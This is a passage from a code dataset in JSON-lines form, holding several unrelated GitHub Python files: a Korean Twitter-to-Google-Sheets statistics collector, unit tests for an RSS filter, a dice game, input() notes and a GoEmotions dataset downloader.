zigZagTraverse(array)\nprint(obj.solution1())","repo_name":"SuvroBaner/software_engineering","sub_path":"algorithms/zigzag_traverse.py","file_name":"zigzag_traverse.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5404053555","text":"import sys, os\nfrom datetime import datetime, timedelta\nimport json\nimport logging\n\n# python-twitter\nimport twitter\nfrom twitter import Status\n# API KEY\nimport secrets\n# 상수\nimport constant\n\n# 공통 모듈\nimport common\n\n# 구글 스프레드시트\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# 이메일 발송\nimport send_email\n\n### 파이썬 SQlite 라이브러리 블러오기 및 버전 확인\nimport sqlite3\nimport traceback\n\nclass twittPostInfo():\n \"\"\"\n twittInfo Class\n Author : 현이\n Data: 2021.08.31\n 사용법: 'ID', {'게시일시', '게시일자', '사용자ID', '사용자계정', '내용', '좋아요수', '리트윗수'}\n \"\"\"\n # 트윗 개수\n twitt_hourly_post_count = 0\n twitt_hourly_like_count = 0\n twitt_hourly_retw_count = 0\n\n # def __init__(self, id_str, create_at, create_date, create_hour, user_name, user_screen_name, favorite_count, retweet_count, text):\n def __init__(self, id_str, details):\n self._id_str = id_str\n self._details = details\n\n def __str__(self):\n return 'str : {} - {}'.format(self._id_str, self._details)\n\n def __repr__(self):\n return 'repr : {} - {}'.format(self._id_str, self._details)\n\n def detail_info(self):\n logger.info('Current ID : {}'.format(id(self)))\n logger.info('Twitt Detail Info : {} {}'.format(self._id_str, self._details.get('favorite_count')))\n\n def get_favorite_count(self):\n return self._details.get('favorite_count')\n\n def get_retweet_count(self):\n return self._details.get('retweet_count')\n\ndef update_twitt_detail_info(status, user_name, twitt_user_info):\n \"\"\"\n desc : Update 상세정보 - 트윗수, 좋아요수, 리트윗수\n parms: 날짜존재여부, 시간존재여부, 일시, TwittRowInfo, 계정유형(normal, ads), 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보\n \"\"\"\n twitt_detail_info = twitt_user_info.get(user_name)\n\n twitt_detail_info['write_count'] += 1\n twitt_detail_info['like_count'] += status.favorite_count\n twitt_detail_info['retwitt_count'] += status.retweet_count\n\ndef create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, **exsits):\n \"\"\"\n desc : 트윗정보 생성 - 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보, 상세트윗정보\n parms: 날짜존재여부, 시간존재여부, 일시, TwittRowInfo, 계정유형(normal, ads), 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보\n \"\"\"\n # 트윗일자\n create_at_date = create_at.strftime('%Y-%m-%d')\n\n # Create 상세정보 - 트윗수, 좋아요수\n twitt_detail_info = {\n # 트윗수\n 'write_count': 1,\n # 좋아요수\n 'like_count': status.favorite_count,\n # 리트윗수\n 'retwitt_count': status.retweet_count,\n }\n # 계정유형별 자료 추가\n twitt_user_info[user_type] = twitt_detail_info\n\n if not exsits['hour_exists']:\n # 시간별 자료 추가\n twitt_hours_info[create_at.strftime('%H')] = twitt_user_info\n\n if not exsits['date_exists']:\n # 일자별 자료 추가\n twitt_days_info[create_at_date] = twitt_hours_info\n\n\ndef get_search_twitt_by_keyword(twitter_api, keyword):\n # 키워드로 검색하기 - 검색어, 100건, 최근, json파일반환\n # statuses = twitter_api.GetSearch(term=keyword, count=100, result_type=\"recent\", return_json=True, since='2021-08-29', until='2021-09-01')\n statuses = twitter_api.GetSearch(term=keyword, count=100, result_type=\"recent\", return_json=True)\n\n # 검색결과 파일 저장\n file_full_path = common.resource_path('history{}{}.json').format(os.path.sep, file_name)\n outfile = open(file_full_path, 'w')\n # outfile = open(f\"{constant.C_ROOT_PATH}\\history\\{datetime.strftime(now_time, '%y%m%d%H%M%S')}.json\", 'w')\n json.dump(statuses, outfile)\n\n # 리스트 변환\n statuses = [Status.NewFromJsonDict(x) for x in statuses.get('statuses', '')]\n\n return statuses\n\ndef main(keyword):\n # twitter api 연동시작\n twitter_api = twitter.Api(consumer_key=secrets.TWITTER_CONSUMER_KEY,\n consumer_secret=secrets.TWITTER_CONSUMER_SECRET, \n access_token_key=secrets.TWITTER_ACCESS_TOKEN, \n access_token_secret=secrets.TWITTER_ACCESS_SECRET)\n\n # 키워드로 검색하기\n statuses = get_search_twitt_by_keyword(twitter_api, keyword)\n\n # 일자별 트윗 정보 {'일자' : {'시간': {'캠페인': {'게시글수':0, '좋아요수':0, '리트윗수':0}}}}\n twitt_days_info = {}\n\n # 검색 내용 출력\n for status in statuses:\n\n # 트윗일시\n create_at = datetime.strptime(status.created_at,'%a %b %d %H:%M:%S +0000 %Y') + timedelta(hours=9)\n # 트윗일자\n create_at_date = create_at.strftime('%Y-%m-%d')\n\n # 광고성 계정인지 확인\n filter_list = [element for element in constant.C_FILTER_KEYWORD if(element in status.user.name)]\n # 계정\n user_type = 'ads' if bool(filter_list) is True else 'normal'\n\n try:\n # 데이터 삽입\n db.execute(\"INSERT INTO SNS_EPIMINT(CAMPAIGN, COLLECT_AT, ID, CREATE_AT, USER_NAME, USER_SCREEN_NAME, TEXT, FAVORITE_COUNT, RETWEET_COUNT, HASHTAGS, SEARCH_QUERY, REMARK) \\\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", \\\n ( campaign\n , datetime.strptime('20{}'.format(file_name),'%Y%m%d%H%M%S')\n , status.id_str\n , create_at\n , status.user.name\n , status.user.screen_name\n , status.text\n , status.favorite_count\n , status.retweet_count\n , ', '.join(map(str, [ h.text for h in status.hashtags if len(status.hashtags) > 0]))\n , keyword\n , None\n ))\n\n except sqlite3.Error as er:\n logger.error('SQLite error: %s' % (' '.join(er.args)))\n logger.error(\"Exception class is: \", er.__class__)\n logger.error('SQLite traceback: ')\n exc_type, exc_value, exc_tb = sys.exc_info()\n logger.error(traceback.format_exception(exc_type, exc_value, exc_tb))\n\n # 일자별 트윗 정보가 존재하는지 확인\n if create_at_date in twitt_days_info:\n ##### 일자별 트윗 정보 존재\n # 일자별 정보 가져오기\n twitt_hours_info = twitt_days_info.get(create_at_date)\n\n # 시간별 트윗 정보가 존재하는지 확인\n if create_at.strftime('%H') in twitt_hours_info:\n ##### 시간별 트윗 정보가 존재\n twitt_user_info = twitt_hours_info.get(create_at.strftime('%H'))\n \n # 사용자가 이미 저장되었는지 확인\n if user_type in twitt_user_info:\n # 상세정보 업데이트 - 트윗수, 좋아요수, 리트윗수\n update_twitt_detail_info(status, user_type, twitt_user_info)\n \n else:\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=True, hour_exists=True)\n\n else:\n ##### 시간별 트윗 정보가 미존재\n # 새로운 시간을 위한 정보\n twitt_user_info = {}\n\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=True, hour_exists=False)\n \n else:\n ##### 일자별 트윗 정보 미존재\n twitt_user_info = {}\n twitt_hours_info = {}\n\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=False, hour_exists=False)\n\n # # logger.info(status)\n logger.info('create_at : ' + str(create_at))\n logger.info('id_str : ' + status.id_str)\n logger.info('name : ' + status.user.name)\n logger.info('screen_name : ' + status.user.screen_name)\n logger.info('favorite_count : ' + str(status.favorite_count))\n logger.info('retweet_count : ' + str(status.retweet_count))\n logger.info('text : ' + status.text)\n logger.info('hashtags : ' + ', '.join(map(str, [ h.text for h in status.hashtags if len(status.hashtags) > 0])))\n # logger.info(status.text.encode('utf-8'))\n logger.info('--------------------------------------------------')\n\n logger.info(f\"검색어 '{keyword}'로 검색된 건수 : {len(statuses)}건\")\n logger.info(twitt_days_info)\n # logger.info('-------------')\n # logger.info(list(twitt_days_info.items()))\n\n # 자료 저장(스프레드시트) 및 메일 발송(gmail)\n save_data_on_spreadsheet(twitt_days_info)\n\ndef save_data_on_spreadsheet(twitt_days_info):\n \"\"\"구글스프레드시트 저장\"\"\"\n scope = [\n 'https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive',\n ]\n\n json_file_path = common.resource_path(constant.C_GOOGLE_API_KEY_FILENAME)\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(json_file_path, scope)\n gc = gspread.authorize(credentials)\n\n # 스프레스시트 문서 가져오기 \n doc = gc.open_by_url(constant.C_SPREADSHEET_URL)\n\n # 스프레드시트 문서명\n # worksheetName = f'{now_time.year}{str(now_time.month).zfill(2)}'\n # worksheetName_daily = f'{now_time.year}{str(now_time.month).zfill(2)}_일자별'\n worksheetName = constant.C_SPREADSHEET_SHEET_NAME_HOURLY\n worksheetName_daily = constant.C_SPREADSHEET_SHEET_NAME_DARILY\n\n # 시트 선택하기\n worksheet = doc.worksheet(worksheetName)\n worksheet_daily = doc.worksheet(worksheetName_daily)\n\n # # 1일이면 시트 생성\n # if now_time.day == 1:\n # # 시트 생성\n # worksheet = doc.add_worksheet(title=worksheetName, rows='1000', cols='22')\n # worksheet_daily = doc.add_worksheet(title=worksheetName_daily, rows='1000', cols='22')\n # # 타이틀 추가\n # worksheet.append_row(constant.C_SPREADSHEET_TITLE1)\n # worksheet_daily.append_row(constant.C_SPREADSHEET_TITLE2)\n\n # 시트 자료 가져오기\n worksheet_datas = worksheet.get_all_records()\n worksheet_datas_daily = worksheet_daily.get_all_records()\n\n # 신규 행 추가 필요 여부\n new_row_yn = True\n # 트윗수 누적, 좋아요수 누적, 리트윗수 누적\n write_count_cumul = 0\n like_count_cumul = 0\n retwitt_count_cumul = 0\n write_count_cumul_prev = 0\n like_count_cumul_prev = 0\n retwitt_count_cumul_prev = 0\n\n # 스프레드 마지막 시트 자료\n worksheet_data_last = worksheet_datas[len(worksheet_datas) - 1]\n\n # 전일 정보\n last_row_list = [worksheet_data for worksheet_data in worksheet_datas\n if (datetime.strftime(now_time + timedelta(days=-1), '%Y-%m-%d') in worksheet_data['게시일자'])]\n\n # 전일 마지막 행\n last_row = last_row_list[len(last_row_list) - 1]\n\n # 스프레드시트 작성\n for post_date, hour_data in sorted(twitt_days_info.items()):\n # logger.info(post_date, hour_data)\n for post_hour, campaign_data in sorted(hour_data.items()):\n # logger.info(post_date, post_hour, campaign_data)\n for campaign, post_data in campaign_data.items():\n\n # 추가 작성 필요 여부\n appendYN = True\n\n # 이전일자 - 기본 값\n prev_post_date = '1111-01-01'\n # 일자 개수\n day_count = 0\n\n # 스프레드시트 내용 확인\n for worksheet_data in worksheet_datas:\n\n day_count = day_count + 1 if prev_post_date == worksheet_data['게시일자'] else 0\n prev_post_date = worksheet_data['게시일자']\n # 스프레드시트 행 수 ( +2 : 인덱스 0부터 시작 / 타이틀 )\n rowCnt = worksheet_datas.index(worksheet_data) + 2\n\n # 스프레드시트의 일자/시간과 수집한 일자/시간과 일치하는지 확인\n if (worksheet_data['게시일자'] == str(post_date) and\n worksheet_data['시간(24시)'] == int(post_hour) and\n worksheet_data['채널'] == campaign):\n ##### 업데이트 필요\n # 같은 일자 누적 자료 갱신\n # if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d')\n if (datetime.strptime(post_date, '%Y-%m-%d')\n == datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') + timedelta(days=-1)):\n # print(datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d'))\n # print(datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') + timedelta(days=-1))\n # 하루 전 합계\n write_count_cumul_prev += list(post_data.values())[0]\n like_count_cumul_prev += list(post_data.values())[1]\n retwitt_count_cumul_prev += list(post_data.values())[2]\n\n # 같은 일자 누적 자료 갱신\n if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d')\n == datetime.strptime(worksheet_data_last['게시일자'], '%Y-%m-%d')):\n # == datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d')):\n if day_count == 0:\n # print(\"0 - worksheet_data['시간(24시)']\" + str(worksheet_data['시간(24시)']))\n # 일자의 첫번째 시간 : 시점과 동일\n write_count_cumul = list(post_data.values())[0]\n like_count_cumul = list(post_data.values())[1]\n retwitt_count_cumul = list(post_data.values())[2]\n else:\n # print(\"else - worksheet_data['시간(24시)']\" + str(worksheet_data['시간(24시)']))\n # 일자의 두번째 이상 시간 : 누적\n write_count_cumul += list(post_data.values())[0]\n like_count_cumul += list(post_data.values())[1]\n retwitt_count_cumul += list(post_data.values())[2]\n\n # 마지막 열이 신규 게시물로 인해 추가된 행이 아닌 경우 업데이트\n if (worksheet_datas.index(worksheet_data) + 1 == len(worksheet_datas) and\n worksheet_data['수집일시'] == '{} {}'.format(worksheet_data['게시일자'], str(worksheet_data['시간(24시)']).zfill(2))):\n # print(worksheet_data['게시일자'], ' ', worksheet_data['시간(24시)'])\n # 수집일시 업데이트\n worksheet.update_acell(f'A{rowCnt}', datetime.strftime(now_time, '%Y-%m-%d %H'))\n # 신규행 추가 불필요\n new_row_yn = False\n\n # 여러셀 업데이트\n cell_list = worksheet.range('E{}:L{}'.format(rowCnt, rowCnt))\n\n cell_values = [list(post_data.values())[0],\n list(post_data.values())[1],\n list(post_data.values())[2],\n write_count_cumul,\n like_count_cumul,\n retwitt_count_cumul,\n like_count_cumul_prev - last_row['좋아요 누적수(D)'],\n retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n ]\n\n for i, val in enumerate(cell_values):\n cell_list[i].value = val\n\n worksheet.update_cells(cell_list)\n\n # 신규 추가 여부\n appendYN = False\n\n # 스프레드시트 열\n colName = \"M\"\n\n # 게시일자 + n일이 수집일자와 같은지 확인\n for i in range(0, 10):\n if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d') + timedelta(days=i+1) ==\n datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') ):\n # logger.info('게시일자 + {}일이 수집일자와 동일'.format(i+1))\n colName = chr(ord(colName) + i)\n\n # 스프레드시트 작성 - 좋아요수 + 리트윗수\n # print(f'{colName}{rowCnt}', list(post_data.values())[1] + list(post_data.values())[2])\n worksheet.update_acell(f'{colName}{rowCnt}', list(post_data.values())[1] + list(post_data.values())[2])\n\n pass\n\n if appendYN == True:\n ##### 신규 건 스프레드시트 작성\n # print('appendYN == True')\n # 신규 행 추가 필요 여부\n new_row_yn = False\n\n # # 트윗수 누적\n # write_count_cumul += worksheet_data_last['게시물 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n # # 좋아요수 누적\n # like_count_cumul += worksheet_data_last['좋아요 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n # # 리트윗수 누적\n # retwitt_count_cumul += worksheet_data_last['리트윗 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n\n # print('신규 건 존재')\n worksheet.append_row([\n datetime.strftime(now_time, '%Y-%m-%d %H')\n , str(post_date)\n , str(post_hour)\n , str(campaign)\n , list(post_data.values())[0]\n , list(post_data.values())[1]\n , list(post_data.values())[2]\n , (write_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[0]\n , (like_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[1]\n , (retwitt_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[2]\n , like_count_cumul_prev - last_row['좋아요 누적수(D)']\n , retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n , \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"\n , \"신규 게시글\"\n ])\n\n if new_row_yn:\n # print('last_write_count_cumul : ' + str(write_count_cumul))\n # print('last_like_count_cumul : ' + str(like_count_cumul))\n # print('last_retwitt_count_cumul : ' + str(retwitt_count_cumul))\n if (worksheet_data_last['게시물 누적수(D)'] == write_count_cumul and\n worksheet_data_last['좋아요 누적수(D)'] == like_count_cumul and\n worksheet_data_last['리트윗 누적수(D)'] == retwitt_count_cumul and\n worksheet_data_last['좋아요 발생'] == like_count_cumul_prev - last_row['좋아요 누적수(D)'] and\n worksheet_data_last['리트윗 발생'] == retwitt_count_cumul_prev - last_row['��트윗 누적수(D)']):\n # print(\"same\")\n pass\n else:\n # print(\"diff\")\n worksheet.append_row([\n datetime.strftime(now_time, '%Y-%m-%d %H')\n , datetime.strftime(now_time, '%Y-%m-%d')\n , datetime.strftime(now_time, '%H')\n , 'normal'\n , 0\n , 0\n , 0\n , write_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , like_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , retwitt_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , like_count_cumul_prev - last_row['좋아요 누적수(D)']\n , retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n , \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"\n , \"신규 좋아요 또는 리트윗\"\n ])\n\n ##### 일자별 Twitt 추이 작성\n # db 조회\n query = open(common.resource_path('emws_day.sql'), 'r', encoding='UTF-8').read()\n db.execute(query)\n\n retrieve_rows = db.fetchall()\n # for retrieve_row in retrieve_rows:\n # print('db', retrieve_row)\n # print('retrieve_row[0]', retrieve_row[0])\n\n # db에서 조회된 자료중 오늘날짜 자료\n summary_today_db = [retrieve_row for retrieve_row in retrieve_rows if (datetime.strftime(now_time, '%Y-%m-%d') in retrieve_row[0])]\n # print(summary_today_db)\n\n # 구글스프레드시트 조회된 자료중 오늘날짜 자료\n summary_today_sheet = [element for element in worksheet_datas_daily if (summary_today_db[0][0] in element['수집일자'])]\n # print(summary_today_sheet)\n\n # db에서 오늘날짜 자료가 있는지 확인\n if len(summary_today_sheet) > 0:\n # print('summary_today', summary_today)\n\n # 스프레드시트 행\n rowCnt2 = worksheet_datas_daily.index(summary_today_sheet[0]) + 2\n\n # 여러셀 업데이트\n cell_list2 = worksheet.range('B{}:D{}'.format(rowCnt2, rowCnt2))\n \n cell_values2 = [summary_today_db[0][2]\n , summary_today_db[0][3]\n , summary_today_db[0][4]\n ]\n \n for i, val in enumerate(cell_values2):\n cell_list2[i].value = val\n\n # 스프레드시트 업데이트\n # print('update_cells', cell_list2)\n worksheet_daily.update_cells(cell_list2)\n else:\n # 스프레드시트 행 추가\n # print('append_row', summary_today_db)\n worksheet_daily.append_row([\n summary_today_db[0][0]\n , summary_today_db[0][2]\n , summary_today_db[0][3]\n , summary_today_db[0][4]\n ])\n\n logger.info('스프레드시트 작성 종료')\n\n # 메일 발송\n send_email_result = send_email.send_email(constant.C_ADMIN_MAIL_ADDRESS, logfile_path)\n\n logger.info(f'메일 발송 결과 : {send_email_result}')\n\nif __name__ == '__main__':\n\n # 현재일시\n now_time = datetime.now()\n file_name = datetime.strftime(now_time, '%y%m%d%H%M%S')\n\n # 로그\n logger = logging.getLogger(\"mainLog\")\n logger.setLevel(logging.INFO)\n loggerHandler = logging.StreamHandler()\n\n formatter = logging.Formatter('%(asctime)s|%(name)s|%(levelname)s:%(message)s')\n loggerHandler.setFormatter(formatter)\n logger.addHandler(loggerHandler)\n\n # Create Handeler == 로깅한 정보가 출력되는 위치 설정\n streamHandler = logging.StreamHandler()\n streamHandler.setLevel(logging.DEBUG)\n streamHandler.setFormatter(formatter)\n # logger.addHandler(streamHandler)\n\n logfile_path = '{}{}log{}{}.log'.format(common.resource_path(''), os.path.sep, os.path.sep, datetime.strftime(now_time, '%y%m%d%H%M%S'))\n # logfile_path = '{}\\log\\{}.log'.format(constant.C_ROOT_PATH, datetime.strftime(now_time, '%y%m%d%H%M%S'))\n\n fileHandler = logging.FileHandler(logfile_path, encoding='utf8')\n fileHandler.setLevel(logging.DEBUG)\n fileHandler.setFormatter(formatter)\n logger.addHandler(fileHandler)\n\n logger.info('----------------------------------------------------------------------------------------------------')\n logger.info(\"start : Search twitter\")\n logger.info('----------------------------------------------------------------------------------------------------')\n\n ### db연결, 커서 획득\n # DB 생성 (오토 커밋)\n conn = sqlite3.connect(common.resource_path('db{}emws.db').format(os.path.sep), isolation_level=None)\n\n # 커서 획득\n db = conn.cursor()\n\n # 테이블 생성 - ALL\n db.execute(\"CREATE TABLE IF NOT EXISTS SNS_EPIMINT \\\n (CAMPAIGN TEXT, COLLECT_AT TEXT, ID TEXT, CREATE_AT TEXT, USER_NAME TEXT, USER_SCREEN_NAME TEXT, TEXT TEXT, FAVORITE_COUNT INTEGER, RETWEET_COUNT INTEGER, HASHTAGS TEXT, SEARCH_QUERY TEXT, REMARK TEXT, PRIMARY KEY(CAMPAIGN, COLLECT_AT, ID))\")\n\n # 캠페인\n campaign = 'twitter'\n\n # Main\n try:\n # 기본 검색어 - 해시태그 포함\n keywordsimple = '에피민트'\n keyword = f'{keywordsimple} OR #{keywordsimple}'\n\n # 확장 검색어 - 리트윗 제외\n keyword_ext = 'AND exclude:retweets'\n # keyword_ext = 'AND exclude:retweets AND filter:quote'\n\n # Full 검색키워드\n full_keyword = f'{keyword} {keyword_ext}'\n\n print(full_keyword)\n\n # 파라미터가 있는지 확인 - 없으면 기본 : '에피민트'\n if len(sys.argv) == 1:\n sys.argv.append(full_keyword)\n else:\n full_keyword = '{} OR #{} {}'.format(sys.argv[1], sys.argv[1], keyword_ext)\n\n # main 호출\n main(full_keyword)\n\n except Exception as inst:\n logger.error(\"error\" + str(inst))\n\n logger.info('----------------------------------------------------------------------------------------------------')\n logger.info(\"end : Search twitter\")\n logger.info('----------------------------------------------------------------------------------------------------')","repo_name":"vntg-esc/emws","sub_path":"main_db.py","file_name":"main_db.py","file_ext":"py","file_size_in_byte":27456,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17899315890","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport unittest\n\n\nclass TestFilterRSS(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.instring = \"\"\"header\n1 Sport http://www1.sportschau.de/\n2 Sport http://www.sportschau.de/\n3 Regionalsport http://www.tagesschau.de/ardimport/sport/\n4 Ausland http://www.tagesschau.de/ausland/\n5 Inland http://www.tagesschau.de/inland/\n6 Kultur http://www.tagesschau.de/kultur/\n7 Regional http://www.tagesschau.de/ardimport/regional/\n8 Videoblog http://www.tagesschau.de/videoblog/\n9 anderes something-different\n10 Regional2 http://www.rbb-online.de/123\n11 Regionalsport2 http://www.rbb-online.de/sport/345\nfooter\\n\"\"\"\n\n\t\t#array containing the lines of instring\n\t\tself.instringArray=self.instring.split('\\n')\n\t\t\n\t\t#select elements to be in the array\n\t\tself.instringSubArray = lambda t: [self.instringArray[i] for i in t]\n\t\t\n\t\t#no need to select header and footer, convert back to string\n\t\tself.subInstring = lambda t:'\\n'.join(self.instringSubArray([0]+list(t)+[-2, -1]))\n\n\n\tdef test_all(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'alles'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([1,2,3,4,5,6,7,8,9,10,11])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\t\n\n\tdef test_alles_außer_Sport(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'alles-außer-Sport'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([4,5,6,7,8,9,10])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\t\n\n\tdef test_Ausland_Inland_Kultur(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'Kultur', 'Ausland', 'Inland'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([4,5,6])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\n\tdef test_Regional_Videoblog_nonsense(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'Videoblog', 'Regional', 'nonsense'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([7,8,10])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\n\tdef test_anderes(self):\n\t\tp = subprocess.Popen(['./filterRSS.py', 'filterTagesschau', 'anderes'],\n\t\t\tstdin=subprocess.PIPE,\n\t\t\tstdout=subprocess.PIPE,\n\t\t\tstderr=subprocess.STDOUT\n\t\t)\n\t\to, e = p.communicate(self.instring.encode('utf-8'))\n\t\tshould = self.subInstring([9])\n\t\tself.assertEqual(o, should.encode('utf-8'), \"\\n\\noutput:\\n\"+o.decode('utf-8')+\"\\nshould be:\\n\"+should)\n\nif __name__ == \"__main__\":\n\t\t\n\tunittest.main()\n","repo_name":"yoook/filterRSS","sub_path":"testFilterTagesschau.py","file_name":"testFilterTagesschau.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30095313298","text":"#Rolling Dice Game\r\nimport random\r\ndef dice_player():\r\n print('Rolling the dice Game! Lets Play')\r\n chance=random.randint(1,2)\r\n if chance==1:\r\n print(\"Welcome Player1! Roll dice\")\r\n number1, number2 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number1,number2)\r\n else:\r\n print(\"Welcome Player2! Roll dice\")\r\n number1, number2 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number1,number2)\r\n print('Next Player Roll dice')\r\n number3, number4 = (random.randint(1, 6), random.randint(1, 6))\r\n print(number3,number4)\r\n t,k=max(number1,number2,number3,number4)\r\n r,s=min(number1,number2,number3,number4)\r\n q,p=num_formed(t,r,k,s)\r\n if q==p:\r\n print(\"Match Over\")\r\n elif q>p:\r\n print('Player1 won the match!Congrats')\r\n else:\r\n print('Player2 won the match!Congrats')\r\n print('Again Want to play?Yes or No?')\r\n t=input()\r\n if t=='Yes':\r\n dice_player()\r\n else:\r\n print('Game Finished')\r\ndef max(number1,number2,number3,number4):\r\n if number1>=number2:\r\n max=number1\r\n else:\r\n max=number2\r\n if number3>=number4:\r\n max1=number3\r\n else:\r\n max1=number4\r\n return max,max1\r\ndef min(number1,number2,number3,number4):\r\n if number1<=number2:\r\n min=number1\r\n else:\r\n min=number2\r\n if number3<=number4:\r\n min1=number3\r\n else:\r\n min1=number4\r\n return min,min1\r\ndef num_formed(t,k,r,s):\r\n x=t*10+k\r\n y=r*10+s\r\n return x,y\r\n\r\ndice_player()","repo_name":"shef1011/simple","sub_path":"dice rolling.py","file_name":"dice rolling.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19463922117","text":"# input() liest vom user eingegebene Daten und gibt diese als String zurück\n# int(input()) gibt einen Integer zurück\n# float(input()) gibt floating ponint zurück\nday = int(input())\nmonth = input()\nprint(day , month)\ninput()\n\n# <>\n# user_name = input('Please enter your name: ')\n# print('Hello, ' + user_name)\n# input()\n\n# Eine andere Art den Username abzufragen\nprint('Enter your Name: ')\nuser_name = input()\nprint('Hello, ' + user_name)\ninput()\n\n# Mehrere Werte als Liste eingeben\n# die Werte müssen mit Freizeichen getrennt sein.\n# nach Eingabe des Letzten Wertes kommt Enter\nmylist = [int(n) for n in input().split()]\nprint(mylist)","repo_name":"pyrrhus-ich/Python-Basics","sub_path":"Nachschlagen/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30755156933","text":"import sys\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom emo_classifier import setup_logger\nfrom training import LocalPaths\n\nlogger = setup_logger(__name__)\nlocal_paths = LocalPaths()\nsys.path.append(str(local_paths.project_root))\n\n\ndef download_csv_as_parquet(file_url: str, file_path: Path, **kwargs):\n if file_path.exists():\n logger.info(f\"The file exists. Nothing is downloaded. Path = {file_path.relative_to(local_paths.project_root)}\")\n else:\n df = pd.read_csv(file_url, **kwargs)\n logger.info(f\"{file_path.name}: {df.shape[0]} x {df.shape[1]}\")\n df.to_parquet(file_path, index=False)\n\n\ndef download_merged_data_sets():\n base_url = \"https://raw.githubusercontent.com/google-research/google-research/master/goemotions/data/\"\n data_set_types = [\"train\", \"dev\", \"test\"]\n file_urls = (f\"{base_url}{typ}.tsv\" for typ in data_set_types)\n file_paths = (local_paths.dir_datasets / f\"{typ}.parquet\" for typ in data_set_types)\n\n for file_url, file_path in zip(file_urls, file_paths):\n download_csv_as_parquet(file_url, file_path, sep=\"\\t\", header=None, names=[\"text\", 